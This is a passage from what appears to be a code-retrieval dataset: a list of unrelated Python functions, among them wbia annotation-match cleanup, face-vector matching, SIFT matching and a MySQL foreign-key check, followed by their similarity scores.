ibs.db.get_table_as_pandas('annotmatch')\n df = annotmatch.set_index(['annot_rowid1', 'annot_rowid2'])\n\n # Find entires that have both directions\n pairs1 = annotmatch[['annot_rowid1', 'annot_rowid2']].values\n f_edges = {tuple(p) for p in pairs1}\n b_edges = {tuple(p[::-1]) for p in pairs1}\n isect_edges = {tuple(sorted(p)) for p in b_edges.intersection(f_edges)}\n isect_edges1 = list(isect_edges)\n isect_edges2 = [p[::-1] for p in isect_edges]\n\n # cols = ['annotmatch_evidence_decision', 'annotmatch_tag_text']\n import pandas as pd\n\n custom_ = {\n (559, 4909): (False, ['photobomb']),\n (7918, 8041): (False, ['photobomb']),\n (6634, 6754): (False, ['photobomb']),\n (3707, 3727): (False, ['photobomb']),\n (86, 103): (False, ['photobomb']),\n }\n extra_ = {}\n\n fixme_edges = []\n\n d1 = df.loc[isect_edges1].reset_index(drop=False)\n d2 = df.loc[isect_edges2].reset_index(drop=False)\n flags = d1['annotmatch_evidence_decision'] != d2['annotmatch_evidence_decision']\n from wbia.tag_funcs import _parse_tags\n\n for f, r1, r2 in zip(flags, d1.iterrows(), d2.iterrows()):\n v1, v2 = r1[1], r2[1]\n aid1 = v1['annot_rowid1']\n aid2 = v1['annot_rowid2']\n truth_real = (\n ibs.const.EVIDENCE_DECISION.POSITIVE\n if aid_to_nid[aid1] == aid_to_nid[aid2]\n else ibs.const.EVIDENCE_DECISION.NEGATIVE\n )\n truth1 = v1['annotmatch_evidence_decision']\n truth2 = v2['annotmatch_evidence_decision']\n t1 = _parse_tags(v1['annotmatch_tag_text'])\n t2 = _parse_tags(v2['annotmatch_tag_text'])\n newtag = ut.union_ordered(t1, t2)\n if (aid1, aid2) in custom_:\n continue\n fixme_flag = False\n if not pd.isnull(truth1):\n if truth_real != truth1:\n fixme_flag = True\n if not pd.isnull(truth2):\n if truth_real != truth2:\n fixme_flag = True\n if fixme_flag:\n logger.info('newtag = {!r}'.format(newtag))\n logger.info('truth_real = {!r}'.format(truth_real))\n logger.info('truth1 = {!r}'.format(truth1))\n logger.info('truth2 = {!r}'.format(truth2))\n logger.info('aid1 = {!r}'.format(aid1))\n logger.info('aid2 = {!r}'.format(aid2))\n fixme_edges.append((aid1, aid2))\n else:\n extra_[(aid1, aid2)] = (truth_real, newtag)\n\n extra_.update(custom_)\n new_pairs = extra_.keys()\n new_truths = ut.take_column(ut.dict_take(extra_, new_pairs), 0)\n new_tags = ut.take_column(ut.dict_take(extra_, new_pairs), 1)\n new_tag_texts = [';'.join(t) for t in new_tags]\n aids1, aids2 = ut.listT(new_pairs)\n\n # Delete the old\n ibs.delete_annotmatch(\n d1['annotmatch_rowid'].values.tolist()\n + d2['annotmatch_rowid'].values.tolist()\n )\n\n # Add the new\n ams = ibs.add_annotmatch_undirected(aids1, aids2)\n ibs.set_annotmatch_evidence_decision(ams, new_truths)\n ibs.set_annotmatch_tag_text(ams, new_tag_texts)\n\n if False:\n import wbia.guitool as gt\n\n gt.ensure_qapp()\n ut.qtensure()\n from wbia.gui import inspect_gui\n\n inspect_gui.show_vsone_tuner(ibs, aid1, aid2)\n\n # pairs2 = pairs1.T[::-1].T\n # idx1, idx2 = ut.isect_indices(list(map(tuple, pairs1)),\n # list(map(tuple, pairs2)))\n # r_edges = list(set(map(tuple, map(sorted, pairs1[idx1]))))\n # unique_pairs = list(set(map(tuple, map(sorted, pairs1[idx1]))))\n # df = annotmatch.set_index(['annot_rowid1', 'annot_rowid2'])\n\n x = ut.ddict(list)\n annotmatch = ibs.db.get_table_as_pandas('annotmatch')\n import ubelt as ub\n\n _iter = annotmatch.iterrows()\n prog = ub.ProgIter(_iter, length=len(annotmatch))\n for k, m in prog:\n aid1 = m['annot_rowid1']\n aid2 = m['annot_rowid2']\n if m['annotmatch_evidence_decision'] == ibs.const.EVIDENCE_DECISION.POSITIVE:\n if aid_to_nid[aid1] == aid_to_nid[aid2]:\n x['agree1'].append(k)\n else:\n x['disagree1'].append(k)\n elif m['annotmatch_evidence_decision'] == ibs.const.EVIDENCE_DECISION.NEGATIVE:\n if aid_to_nid[aid1] == aid_to_nid[aid2]:\n x['disagree2'].append(k)\n else:\n x['agree2'].append(k)\n\n ub.map_vals(len, x)\n ut.dict_hist(annotmatch.loc[x['disagree1']]['annotmatch_tag_text'])\n\n disagree1 = annotmatch.loc[x['disagree1']]\n pb_disagree1 = disagree1[disagree1['annotmatch_tag_text'] == 'photobomb']\n aids1 = pb_disagree1['annot_rowid1'].values.tolist()\n aids2 = pb_disagree1['annot_rowid2'].values.tolist()\n aid_pairs = list(zip(aids1, aids2))\n infr = wbia.AnnotInference.from_pairs(aid_pairs, ibs=ibs, verbose=5)\n if False:\n feedback = infr.read_wbia_annotmatch_feedback(edges=infr.edges())\n infr.external_feedback = feedback\n infr.apply_feedback_edges()\n infr.start_qt_interface(loop=False)\n\n # Delete these values\n if False:\n nonpb_disagree1 = disagree1[disagree1['annotmatch_tag_text'] != 'photobomb']\n disagree2 = annotmatch.loc[x['disagree2']]\n ibs.delete_annotmatch(nonpb_disagree1['annotmatch_rowid'])\n ibs.delete_annotmatch(disagree2['annotmatch_rowid'])\n\n # ut.dict_hist(disagree1['annotmatch_tag_text'])\n import networkx as nx\n\n graph = nx.Graph()\n graph.add_edges_from(zip(pb_disagree1['annot_rowid1'], pb_disagree1['annot_rowid2']))\n list(nx.connected_components(graph))\n\n set(annotmatch.loc[x['disagree2']]['annotmatch_tag_text'])\n\n # aid1, aid2 = 2585, 1875\n # # pd.unique(annotmatch['annotmatch_evidence_decision'])\n # from wbia.gui import inspect_gui\n # inspect_gui.show_vsone_tuner(ibs, aid1, aid2)\n # from vtool import inspect_matches\n\n # aid1, aid2 = 2108, 2040\n\n # pd.unique(annotmatch['annotmatch_tag_text'])\n\n # infr.reset_feedback()\n # infr.relabel_using_reviews()", "def test_labels_match_geographies(self):\n geo = self.geographies.find_one({ 'geoid': '15' })\n labels = self.labels.find_one({ 'dataset': 'SF1' })\n\n geo_tables = geo['data']['2010']\n labels_tables = labels['tables']\n\n self.assertEqual(sorted(geo_tables.keys()), sorted(labels_tables.keys()))\n\n # Test table has labels\n for table_name, geo_keys in geo_tables.items():\n label_keys = labels_tables[table_name]['labels']\n\n self.assertEqual(sorted(geo_keys.keys()), sorted(label_keys.keys()))\n\n for table_name, label_data in labels_tables.items():\n label_keys = label_data['labels']\n geo_keys = geo_tables[table_name]\n\n self.assertEqual(sorted(geo_keys.keys()), sorted(label_keys.keys()))", "def refseq_based_clustering(self):\n self.refseq_based = NonRedSetDict()\n for prey in self.ivv_info.Prey_info().preys():\n refseqid = self.get_refseq(prey)\n if refseqid:\n self.refseq_based.append_Dict(refseqid, prey)", "def _attentive_matching(self, h1, h2, cosine_matrix, w):\n # h1 * weights, (batch_size, h1_timesteps, mp_dim, embedding_size)\n h1 = self._time_distributed_multiply(h1, w)\n # attentive vector (batch_size, h1_timesteps, embedding_szie)\n attentive_vec = self._mean_attentive_vectors(h2, cosine_matrix)\n # attentive_vec * weights, (batch_size, h1_timesteps, mp_dim, embedding_size)\n attentive_vec = self._time_distributed_multiply(attentive_vec, w)\n # matching vector, (batch_size, h1_timesteps, mp_dim)\n matching = self._cosine_similarity(h1, attentive_vec)\n return matching", "def match_against_database(list_of_face_vectors):\n\n threshold_of_similarity = 0.4\n\n if len(list_of_face_vectors) != 0:\n #Load the database, if it exists.\n if (file_path/\"names_and_faces.pkl\").exists():\n with open(file_path/\"names_and_faces.pkl\", mode = \"rb\") as opened_file:\n names_and_faces = pickle.load(opened_file)\n\n #Calculate the mean for each key.\n for key in names_and_faces:\n names_and_faces[key] = np.array(names_and_faces[key]).mean(axis = 0)\n\n\n #Here comes the fun part! Iterate thru our list of face vectors to find the best candidate name for each face vector.\n face_vectors = np.array(list_of_face_vectors)\n #print(face_vectors.shape)\n names = np.array(list(names_and_faces.keys()))\n faces = np.array(list(names_and_faces.values()))\n candidates = L2_dists_vectorized(face_vectors, faces)\n\n minimum_indices = np.argmin(candidates, axis = 1)\n #print(\"candidates are\", candidates)\n minimum_args = np.min(candidates, axis = 1)\n names_to_return = names[minimum_indices]\n names_to_return[minimum_args > threshold_of_similarity] = \"unknown\"\n\n\n return names_to_return\n\n\n else:\n return 0\n else:\n return 0", "def icontains(self, other):", "def keyDependsOnKey(self, k1Name, k2Name):\n if k1Name == k2Name: return 0\n k1 = self.infoKinds[k1Name]\n k2 = self.infoKinds[k2Name]\n if k1.superNames != k2.superNames:\n allSuperK1 = set()\n toDoK1 = list(k1.superNames)\n allSuperK2 = set()\n toDoK2 = list(k2.superNames)\n while (len(toDoK1) > 0 or len(toDoK2) > 0):\n if len(toDoK1) > 0:\n el1Name = toDoK1.pop()\n if k2Name == el1Name:\n return 1\n el1 = self.infoKinds[el1Name]\n if el1.kindStr in self and not el1.kindStr in allSuperK1:\n toDoK1.append(el1.kindStr)\n for subEl in el1.superNames:\n if not subEl in allSuperK1:\n toDoK1.append(subEl)\n allSuperK1.update(el1.superNames)\n if len(toDoK2) > 0:\n el2Name = toDoK2.pop()\n if k1Name == el2Name:\n return -1\n el2 = self.infoKinds[el2Name]\n if el2.kindStr in self and not el2.kindStr in allSuperK2:\n toDoK2.append(el2.kindStr)\n for subEl in el2.superNames:\n if not subEl in allSuperK2:\n toDoK2.append(subEl)\n allSuperK2.update(el2.superNames)\n return None", "def GetSubkeys(self):", "def test_fkey_nav(dumper, db):\n dumper.reader.load_db(\n db.create_sample(3, fkeys=[(\"table1\", \"t2id\", \"table2\", \"id\")])\n )\n dumper.add_config({\"db_objects\": [{\"name\": \"table1\"}]})\n dumper.perform_dump()\n objs = [obj for obj, match in dumper.writer.dumped if isinstance(obj, Table)]\n assert len(objs) == 2", "def lookup():", "def testBeliefs2sk(self):", "def test_associations(self):\n\n oj = {}\n\n if self.DEBUG:\n print \"Create A\"\n\n # create a\n a = self.save_base_metadata()\n\n oj[a.uuid] = 'A'\n\n if self.DEBUG:\n print \"Create B, point B to A\"\n\n # create b, point b to a\n b = self.save_base_metadata()\n\n oj[b.uuid] = 'B'\n\n b.add_association_to(a)\n\n # save a, b\n b.save()\n a.save()\n\n if self.DEBUG:\n self.printy(oj, a, b, None, None, None)\n\n # test b pointing to a\n self.assertIn(a, b.my_associations)\n # test to see if a is aware of association from b\n # self.assertIn(b, a.associations_to_me)\n\n if self.DEBUG:\n print \"Create C, point C to B\"\n\n # create c, point c to b\n c = self.save_base_metadata()\n\n oj[c.uuid] = 'C'\n\n c.add_association_to(b)\n\n # a.save()\n\n # save b, c\n c.save()\n b.save()\n\n if self.DEBUG:\n self.printy(oj, a, b, c, None, None)\n\n # test c pointing to a\n self.assertIn(a, c.my_associations)\n # test c aware of association from a\n self.assertIn(c, a.associations_to_me)\n\n # test c pointing to b\n self.assertIn(b, c.my_associations)\n # test b aware of association from c\n self.assertIn(c, b.associations_to_me)\n\n if self.DEBUG:\n print \"create D, point to B\"\n\n # create d, point to b\n d = self.save_base_metadata()\n\n oj[d.uuid] = 'D'\n\n d.add_association_to(b)\n\n # a.save()\n\n # save d, b\n d.save()\n b.save()\n\n if self.DEBUG:\n self.printy(oj, a, b, c, d, None)\n\n # test d pointing to a\n self.assertIn(a, d.my_associations)\n # test a aware of assoication from d\n self.assertIn(d, a.associations_to_me)\n\n # test d pointing to b\n self.assertIn(b, d.my_associations)\n # test b aware of association from d\n self.assertIn(d, b.associations_to_me)\n\n if self.DEBUG:\n print \"Create E, point to A\"\n\n # create e, point to a\n e = self.save_base_metadata()\n\n oj[e.uuid] = 'E'\n\n e.add_association_to(a)\n\n # save e, a\n e.save()\n a.save()\n\n if self.DEBUG:\n self.printy(oj, a, b, c, d, e)\n\n # test e pointing to a\n self.assertIn(a, e.my_associations)\n # test a aware of association from e\n self.assertIn(b, a.associations_to_me)", "def detail_matching(self):\n paradic = self.cfg['param']['paradic']\n work_dir = self.work_dir\n \n x = float(self.cfg['param']['x']) # selected pixel in the first image\n y = float(self.cfg['param']['y'])\n \n # sift parameters\n # number of bins in the orientation histogram\n n_bins = int(paradic['n_bins']) \n n_hist = int(paradic['n_hist']) \n # descriptor of n_hist X n_hist weighted histograms with n_ori\n n_ori = int(paradic['n_ori']) \n delta_min = float(paradic['delta_min'])\n sigma_min = float(paradic['sigma_min'])\n sigma_in = float(paradic['sigma_in'])\n lambda_ori = float(paradic['lambda_ori'])\n lambda_descr = float(paradic['lambda_descr'])\n #threshold defining reference orientations\n n_spo = int(paradic['n_spo'])\n \n # Read feature vectors from output files\n if (os.path.getsize(work_dir+'OUTmatches.txt') > 0 ):\n pairdata = find_nearest_keypoint(work_dir+'OUTmatches.txt', y, x)\n \n illustrate_pair(pairdata, n_bins, n_hist, n_ori, work_dir)\n\n \n # Read keys coordinates.\n d = 6+n_bins+n_hist*n_hist*n_ori # size of keydata inside pairdata\n v = n_hist*n_hist*n_ori\n [x1, y1, sigma1, theta1] = [float(x) for x in pairdata[0:4]]\n [o1, s1] = [float(x) for x in pairdata[4+v:4+v+2]]\n [x2a, y2a, sigma2a, theta2a] = [float(x) for x in pairdata[d:d+4]]\n [o2a, s2a] = [float(x) for x in pairdata[d+4+v:d+4+v+2]]\n [x2b, y2b, sigma2b, theta2b] = \\\n [float(x) for x in pairdata[2*d:2*d+4]]\n [o2b, s2b] = [float(x) for x in pairdata[2*d+4+v:2*d+4+v+2]]\n \n draw_one_match(pairdata,\n work_dir+'input_0.png',\n work_dir+'input_1.png',\n d,\n lambda_ori,\n lambda_descr,\n n_hist,\n work_dir+'OUTonepair.png')\n \n \n # Extract thumbnails.\n # keypoint 1 (image 1)\n print ' '.join(['demo_extract_patch', work_dir+'input_0.png',\n str(x1), str(y1), str(sigma1), str(theta1), str(o1), str(s1),\n str(delta_min), str(sigma_min), str(sigma_in), str(n_spo),\n str(lambda_ori), str(lambda_descr), str(n_hist),\n work_dir+\"detail_im1\"])\n proc = self.run_proc(['demo_extract_patch', work_dir+'input_0.png',\n str(x1), str(y1), str(sigma1), str(theta1), str(o1), str(s1),\n str(delta_min), str(sigma_min), str(sigma_in), str(n_spo),\n str(lambda_ori), str(lambda_descr), str(n_hist),\n work_dir+\"detail_im1\"])\n self.wait_proc(proc, timeout=self.timeout)\n \n # keypoint 2a (nearest neighbor in image 2)\n print ' '.join(['demo_extract_patch', work_dir+'input_1.png',\n str(x2a), str(y2a), str(sigma2a), str(theta2a), str(o2a), str(s2a),\n str(delta_min), str(sigma_min), str(sigma_in), str(n_spo),\n str(lambda_ori), str(lambda_descr), str(n_hist),\n work_dir+\"detail_im2a\"])\n proc = self.run_proc(['demo_extract_patch', work_dir+'input_1.png',\n str(x2a), str(y2a), str(sigma2a), str(theta2a), str(o2a), str(s2a),\n str(delta_min), str(sigma_min), str(sigma_in), str(n_spo),\n str(lambda_ori), str(lambda_descr), str(n_hist),\n work_dir+\"detail_im2a\"])\n self.wait_proc(proc, timeout=self.timeout) \n \n # keypoint 2b (second nearest neighbor in image 2)\n proc = self.run_proc(['demo_extract_patch', work_dir+'input_1.png',\n str(x2b), str(y2b), str(sigma2b), str(theta2b), str(o2b), str(s2b),\n str(delta_min), str(sigma_min), str(sigma_in), str(n_spo),\n str(lambda_ori), str(lambda_descr), str(n_hist),\n work_dir+\"detail_im2b\"])\n self.wait_proc(proc, timeout=self.timeout) \n \n \n return 1", "def _backreference_keys(self, ref, key_in_ref):\n return (self.__class__.REFERENCE_FIELDS +\n self.__class__.DEPENDENT_LINES +\n self.__class__.OTHER_REFERENCES)", "def additionalMatch(handIn, indx):", "def _candidate_generation(self):\n doc = self.nlp(self.text)\n named_entity_dict = {}\n named_entity_key_list = []\n named_entity_value_list = []\n entity_from_text_list = []\n offline_dic_list = []\n matched_element_list = []\n\n for ent in doc.ents:\n named_entity = (str(ent.text) + ':' + str(ent.label_))\n named_entity = (named_entity.split(':'))\n # named_entity_key = named_entity[0].replace('\\n', '')\n # named_entity_key_list.append(named_entity_key)\n # named_entity_value = named_entity[1].replace('\\n', '')\n # named_entity_value_list.append(named_entity_value)\n named_entity_value = named_entity[1].replace('\\n', '')\n named_entity_value_list.append(named_entity_value)\n filtered_words = (str(ent.text).split())\n filtered_words = [w for w in filtered_words if w.lower() not in self.english_stopwords]\n named_entity_key = [' '.join(filtered_words)]\n for i in named_entity_key:\n named_entity_key_list.append(i)\n for key in named_entity_key_list:\n named_entity_dict[key] = []\n i = 0\n for key in named_entity_key_list:\n named_entity_dict[key].append(named_entity_value_list[i])\n i = i + 1\n\n entities = \"ORG PERSON LOC GPE\".split()\n for entity in entities:\n entity_from_text = [k for k, v in named_entity_dict.items() if entity in v]\n for item in entity_from_text:\n entity_from_text_list.append(item)\n\n if not entity_from_text_list:\n self.logger.info('No named entity found in the input text')\n else:\n self.logger.info('Entities which are identified from the input sentence')\n self.logger.info(entity_from_text_list)\n\n for key, value in self.offline_dic.items():\n offline_dic_list.append(key)\n\n for item in entity_from_text_list:\n for item1 in offline_dic_list:\n if item == item1:\n matched_element_list.append(item)\n\n big_final_dict = []\n for i in matched_element_list:\n candidate_list = [v for k, v in self.offline_dic.items() if str(k) == str(i)]\n final_dict = dict(zip(i.split('\\n'), candidate_list))\n big_final_dict.append(final_dict)\n\n if not big_final_dict:\n self.logger.warning(\"No Match found in the KB\")\n return matched_element_list, None\n else:\n self.logger.info('found entities')\n return matched_element_list, big_final_dict", "def match(desc1, desc2):\n desc1 = array([d/linalg.norm(d) for d in desc1])\n desc2 = array([d/linalg.norm(d) for d in desc2])\n\n dist_ratio = 0.6\n disc1_size = desc1.shape\n\n matchscores = zeros((desc1_size[0]), \"int\")\n desc2t = desc2.T\n for i in range(desc1_size[0]):\n dotprods = dot(desc1[i, :], desc2t)\n dotprods = 0.9999 * dotprods\n\n indx = argsort(arccos(dotprods))\n\n if arccos(dotprods)[indx[0]] < dist_ratio * arccos(dotprods)[indx[1]]:\n matchscores[i] = int(indx[0])\n\n return matchscores", "def allow_relation(self, obj1, obj2, **hints):\n if (\n obj1._meta.label_lower in self.route_encuestas or\n obj2._meta.label_lower in self.route_encuestas\n ):\n return True\n return None", "def _create_auto_key(self,identifier2organism={}):\n # when this is a locus in a dbwarehouse, abstract the genomedirname\n realdirname = os.path.realpath(self.dirname)\n if realdirname.find(\"/loci/\") > 0:\n key = os.path.basename(realdirname[0:realdirname.find(\"/loci/\")])\n if key: return key\n # if this point is reached, NOT a locus in dbwarehouse\n # check if we can map the gene's id to an organism ID\n if identifier2organism:\n for identifierpart,organism in identifier2organism.iteritems():\n if self.fref.find(identifierpart) == 0:\n # succesfull mapping\n return organism\n else:\n # mapping was not succesfull\n return self.fref\n else:\n return self.fref", "def __contains__(self, y): # real signature unknown; restored from __doc__\r\n pass", "def targetids(obj, reftype):", "def bipartite_matching(data=None, is_ascend=_Null, threshold=_Null, topk=_Null, out=None, name=None, **kwargs):\n return (0,)", "def match(self, product):\n\n raise NotImplementedError, 'need impletent match method'", "def toggle_ik_fk(*args):\n\n current_tab = pm.tabLayout('switcher_tab_layout',\n query=True,\n selectTab=True)\n\n if current_tab == 'ikTab':\n ik_tab = 1\n else:\n ik_tab = 0\n\n robots = get_robot_roots(1)\n if not robots:\n return\n\n for robot in robots:\n target_ctrl_path = get_target_ctrl_path(robot)\n \n if ik_tab:\n if pm.getAttr(target_ctrl_path + '.ik'):\n continue\n\n switch_to_ik(robot)\n\n else:\n if not pm.getAttr(target_ctrl_path + '.ik'):\n continue\n\n switch_to_fk(robot)\n \n # Maintain appropriate selections on each robot\n try:\n selection = []\n active_robots = get_robot_roots()\n if active_robots:\n if ik_tab:\n for robot in active_robots:\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n\n if pm.objExists(tool_ctrl_path):\n selection.append(tool_ctrl_path)\n else:\n selection.append(target_ctrl_path)\n else:\n for robot in active_robots:\n selection.append(format_path(__A6_FK_CTRL_PATH, robot))\n \n pm.select(selection)\n else:\n pass\n\n except:\n pm.warning('Error selecting after IK/FK switch')", "def expected_relations():\n reldict = {('project', 'userspec'): ('specs', False),\n ('project', 'userdoc'): ('docs', False),\n ('project', 'userwijz'): ('rfcs', False),\n ('project', 'userprob'): ('probs', False),\n ('project', 'funcdoc'): ('fdocs', False),\n ('project', 'gebrtaak'): ('gtaken', False),\n ('project', 'funcproc'): ('fprocs', False),\n ('project', 'entiteit'): ('fdata', False),\n ('project', 'attribuut'): (None, None),\n ('project', 'techtaak'): ('ttask', False),\n ('project', 'techproc'): ('tproc', False),\n ('project', 'dataitem'): ('tdata', False),\n ('project', 'element'): (None, None),\n ('project', 'layout'): ('layout', False),\n ('project', 'programma'): ('pproc', False),\n ('project', 'testplan'): ('tplan', False),\n ('project', 'testcase'): ('tcase', False),\n ('project', 'bevinding'): ('tbev', False),\n ('userspec', 'project'): ('project', False),\n ('userspec', 'gebrtaak'): ('gtaken', False),\n ('userspec', 'funcproc'): ('fprocs', False),\n ('userdoc', 'project'): ('project', False),\n ('userwijz', 'project'): ('project', False),\n ('userwijz', 'gebrtaak'): ('gtaken', True),\n ('userwijz', 'funcproc'): ('fprocs', True),\n ('userwijz', 'entiteit'): ('fdata', True),\n ('userprob', 'project'): ('project', False),\n ('funcdoc', 'project'): ('project', False),\n ('gebrtaak', 'project'): ('project', False),\n ('gebrtaak', 'userspec'): ('spec', False),\n ('gebrtaak', 'userwijz'): ('rfc', True),\n ('gebrtaak', 'funcproc'): ('fprocs', True),\n ('gebrtaak', 'techtaak'): ('ttask', False),\n ('gebrtaak', 'layout'): ('layout', True),\n ('gebrtaak', 'testplan'): ('tplan', True),\n ('funcproc', 'project'): ('project', False),\n ('funcproc', 'userspec'): ('spec', False),\n ('funcproc', 'userwijz'): ('rfc', True),\n ('funcproc', 'gebrtaak'): ('gt', True),\n ('funcproc', 'funcproc'): ('used_by', True),\n ('funcproc', 'entiteit'): ('fdata', True),\n ('funcproc', 'techproc'): ('tproc', True),\n ('funcproc', 'testplan'): ('tplan', True),\n ('entiteit', 'project'): ('project', False),\n ('entiteit', 'userwijz'): ('rfc', True),\n ('entiteit', 'funcproc'): ('fp', True),\n ('entiteit', 'attribuut'): ('attrs', False),\n ('entiteit', 'dataitem'): ('tdata', True),\n ('entiteit', 'testplan'): ('tplan', True),\n ('attribuut', 'entiteit'): ('hoort_bij', False),\n ('techtaak', 'project'): ('project', False),\n ('techtaak', 'gebrtaak'): ('gt', False),\n ('techtaak', 'techproc'): ('tproc', True),\n ('techproc', 'project'): ('project', False),\n ('techproc', 'funcproc'): ('fp', True),\n ('techproc', 'techtaak'): ('tt', True),\n ('techproc', 'techproc'): ('used_by', True),\n ('techproc', 'dataitem'): ('tdata', True),\n ('techproc', 'layout'): ('layout', True),\n ('techproc', 'programma'): ('pproc', True),\n ('dataitem', 'project'): ('project', False),\n ('dataitem', 'entiteit'): ('ent', True),\n ('dataitem', 'techproc'): ('tp', True),\n ('element', 'dataitem'): ('hoort_bij', False),\n ('layout', 'project'): ('project', False),\n ('layout', 'gebrtaak'): ('gt', True),\n ('layout', 'techproc'): ('tp', True),\n ('programma', 'project'): ('project', False),\n ('programma', 'techproc'): ('tp', True),\n ('testplan', 'project'): ('project', False),\n ('testplan', 'gebrtaak'): ('gt', True),\n ('testplan', 'funcproc'): ('fp', True),\n ('testplan', 'entiteit'): ('ent', True),\n ('testplan', 'testcase'): ('tcase', True),\n ('testplan', 'bevinding'): ('tbev', True),\n ('testcase', 'project'): ('project', False),\n ('testcase', 'testplan'): ('tplan', True),\n ('bevinding', 'project'): ('project', False),\n ('bevinding', 'testplan'): ('tplan', True)}\n return reldict", "def foreign_key_check(self):\n # MyRocks doesn't support foreign key\n if self.is_myrocks_table:\n log.info(\n \"SKip foreign key check because MyRocks doesn't support \" \"this yet\"\n )\n return True\n foreign_keys = self.query(\n sql.foreign_key_cnt,\n (\n self.table_name,\n self._current_db,\n self.table_name,\n self._current_db,\n ),\n )\n if foreign_keys:\n fk = \"CONSTRAINT `{}` FOREIGN KEY (`{}`) REFERENCES `{}` (`{}`)\".format(\n foreign_keys[0][\"constraint_name\"],\n foreign_keys[0][\"col_name\"],\n foreign_keys[0][\"ref_tab\"],\n foreign_keys[0][\"ref_col_name\"],\n )\n raise OSCError(\n \"FOREIGN_KEY_FOUND\",\n {\"db\": self._current_db, \"table\": self.table_name, \"fk\": fk},\n )" ]
[ "0.64621747", "0.6233758", "0.6001383", "0.5866673", "0.5858059", "0.57838565", "0.5618625", "0.5599867", "0.55876", "0.55551654", "0.54261523", "0.54143274", "0.54062307", "0.5399775", "0.5396218", "0.5388583", "0.53567606", "0.52986205", "0.52962285", "0.52947336", "0.5270456", "0.52457756", "0.52436656", "0.5234153", "0.5215751", "0.5209741", "0.52039987", "0.51976883", "0.51751417", "0.513496", "0.5124755", "0.51244444", "0.5111415", "0.51066446", "0.5094734", "0.5087002", "0.50820637", "0.50728524", "0.5069215", "0.5069034", "0.5059516", "0.5058986", "0.505482", "0.50440556", "0.50200105", "0.50195944", "0.5015092", "0.49933347", "0.49906576", "0.49774295", "0.49707735", "0.4969237", "0.49641386", "0.49542177", "0.49400368", "0.49381348", "0.49343276", "0.49323833", "0.49271497", "0.49226353", "0.49123183", "0.49109057", "0.49082664", "0.4907925", "0.49060917", "0.49055988", "0.4892699", "0.4889825", "0.48897797", "0.48859495", "0.4878314", "0.48775724", "0.48763362", "0.48691982", "0.4868415", "0.48675773", "0.4866646", "0.48627332", "0.4855944", "0.48543733", "0.48530525", "0.48523977", "0.48483887", "0.48477188", "0.48449484", "0.4842367", "0.4834079", "0.48284882", "0.48250896", "0.48239818", "0.48229423", "0.48184416", "0.48154104", "0.48120958", "0.48113972", "0.48113298", "0.48109913", "0.48106575", "0.48094448", "0.4789479", "0.47865412" ]
0.0
-1